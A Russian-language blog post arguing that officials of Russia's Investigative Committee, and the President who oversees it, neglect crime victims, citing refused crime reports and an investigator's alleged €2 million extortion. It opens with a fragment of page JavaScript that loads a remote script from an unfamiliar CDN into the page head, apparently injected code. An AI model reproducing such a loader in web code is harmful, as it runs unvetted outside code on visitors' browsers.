, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Что происходит, когда, лица, осуществляющие государственную власть, не понимают её предназначение

17 Дек

Уголовное судопроизводство имеет своим назначением защиту прав и законных интересов потерпевших от преступлений, а также защиту личности от незаконного и необоснованного обвинения, осуждения, ограничения её прав и свобод.

Начало такой защиты возложено на Следственный комитет Российской Федерации (СК России) — федеральный государственный орган в Российской Федерации, осуществляющий полномочия в сфере уголовного судопроизводства.

Основными задачами http://www.consultant.ru/document/cons_doc_LAW_108565/019eea665257980aca04050c9f33da30f551c857/   Следственного комитета являются:

1) оперативное и качественное расследование преступлений в соответствии с подследственностью, установленной уголовно-процессуальным законодательством Российской Федерации;

2) обеспечение законности при приеме, регистрации, проверке сообщений о преступлениях, возбуждении уголовных дел, производстве предварительного расследования, а также защита прав и свобод человека и гражданина;

3) осуществление процессуального контроля деятельности следственных органов Следственного комитета и их должностных лиц.

При этом  руководство деятельностью Следственного комитета  возложено на Президента Российской Федерации. А это значит, что Владимир Путин  контролирует, как законодательно  поставленные задачи исполняются.

С контролем что-то явно не заладилось.

Проводимые исследования и публичные заявления https://rg.ru/2015/01/12/chaika.html    Генерального прокурора Ю. Чайки, удостоверяют, что не все пострадавшие от преступлений получают статус «потерпевший», из-за того, что «людям отказывают в приеме их заявлений о преступлениях при наличии бесспорных поводов и оснований для возбуждения уголовного дела. Отмененные прокурорами постановления об отказе в возбуждении уголовного дела исчисляются миллионами».

А это значит, что ежегодно должностные лица СК России не признают, не соблюдают и не защищают права и свободы миллионов россиян, пострадавших от преступлений.

Вот результаты руководства деятельностью Следственного комитета  Президентом Российской Федерации.

Чем же в это время заняты должностные лица СК России?

Ответ даёт анализ публикаций https://www.kommersant.ru/doc/3833564?utm_source=yxnews&utm_medium=desktop, посвящённых работе следователей.
Так, столичное управление Следственного комитета России (СКР) возбудило уголовное дело в отношении бывшего следователя 23-летней Марии Слезкиной. Проработав в комитете менее года, она успела стать фигуранткой коррупционного скандала: по версии следствия, госпожа Слезкина вымогала в СИЗО «Бутырка» €2 млн у арестованного по обвинению в похищении человека мурманского рыбопромышленника Юрия Тузова. За эту сумму следователь, согласно материалам дела, обещала отпустить бизнесмена под домашний арест, а в случае отказа угрожала длительными сроками самому господину Тузову и его сыну. После этой истории госпожа Слезкина уволилась и уехала за границу.

Как могло получиться, что в 23 года, молодой специалист, Слезкина  стала старшим следователем  по расследованию особо важных дел управления по ЦАО ГСУ СКР по Москве?

Кто тот начальник, что позволил госпоже Слезкиной, несмотря на ее профессиональную неопытность, расследование  сложного и неоднозначного уголовного дела в отношении одного из крупнейших российских рыбопромышленников Юрия Тузова?

Кто и почему позволил   Слезкиной спокойно уволиться из СКР, в кратчайшие сроки сдать экзамен на адвоката в Адвокатской палате Северной Осетии, и возможно, скрыться за границей?

Ответ на эти вопросы позволяет утверждать, что должностные лица СКР  полномочия в сфере уголовного судопроизводства осуществляют не в интересах россиян.

Их не волнует ни судьба потерпевших от преступлений, ни защита личности от незаконного и необоснованного обвинения. У них свой интерес, который проявляется в иностранных авто, на которых они приезжают на работу, шикарных квартирах и домах, что у всех россиян на виду. Но именно к ним, этим обладателям «сомнительной собственности» Владимир Путин и не спешит применить п.п. 8 п. 2 статьи 235 ГК РФ, который сделал бы бесполезным поборы с  предпринимателей.

Надо признать, что Председатель Следственного комитета Российской Федерации, генерал юстиции Российской Федерации Александр Иванович Бастрыкин много сам трудится, пытаясь добиться от своих подчинённых исполнения, поставленных перед следствием задач, но, не зная сути следствия, не зная механизма следственной работы, результаты могут быть только такими.

Нет ни опыта не знаний и у Владимира Путина, обязанного осуществлять руководство деятельностью Следственного комитета.

Поэтому каждое должностное лицо в СКР живёт свое, нередко криминальной  и безнаказанной жизнью.

Мне, как юристу, работавшему следователем в Москве, а затем и занимавшемуся более 30 лет  проблемами предварительного расследования, особенно обидно это видеть.

Но мои обиды Владимир Путин не желает слушать и вряд ли обратит внимание на них в своём очередном общении с россиянами  20 декабря 2018 г.

Вот так уже второе десятилетие единственный источник власти, многонациональный народ страны, живет по своим правилам, а осуществляющие государственную власть, по — своим. Но, иногда, вместе печалятся.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.